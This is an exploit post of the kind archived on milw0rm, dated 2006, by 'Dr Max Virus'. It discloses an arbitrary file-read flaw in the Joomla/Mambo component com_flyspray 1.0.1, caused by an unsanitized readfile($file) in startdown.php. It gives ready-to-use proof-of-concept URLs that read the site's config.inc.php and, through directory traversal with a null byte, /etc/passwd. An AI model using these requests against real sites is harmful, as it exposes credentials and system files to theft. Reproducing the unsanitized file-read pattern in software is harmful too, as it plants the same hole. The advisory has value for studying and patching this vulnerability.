_____ __ __ __ ___ | __ \ | \/ | \ \ / (_) | | | |_ __ | \ / | __ ___ __ \ \ / / _ _ __ _ _ ___ | | | | '__| | |\/| |/ _` \ \/ / \ \/ / | | '__| | | / __| | |__| | | | | | | (_| |> < \ / | | | | |_| \__ \ |_____/|_| |_| |_|\__,_/_/\_\ \/ |_|_| \__,_|___/ ***************************************************************************************************************************** Compononent name:com_flyspray Affected Version:1.0.1 d.page:http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip ***************************************************************************************************************************** Authour: Dr Max Virus Location:Egypt ***************************************************************************************************************************** Bug in :startdown.php Vul Code: In Line 52: readfile($file); Problem:The variable of file not sanitized So u can read any file on server and also config file ***************************************************************************************************************************** POC: http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00 ***************************************************************************************************************************** Thx To:str0ke & Nukedx & Thehacker & All My Friends Special Gr33Ts:ASIANEAGLE & The Master &Kacper **************************************************************************************************************************** # milw0rm.com [2006-11-26]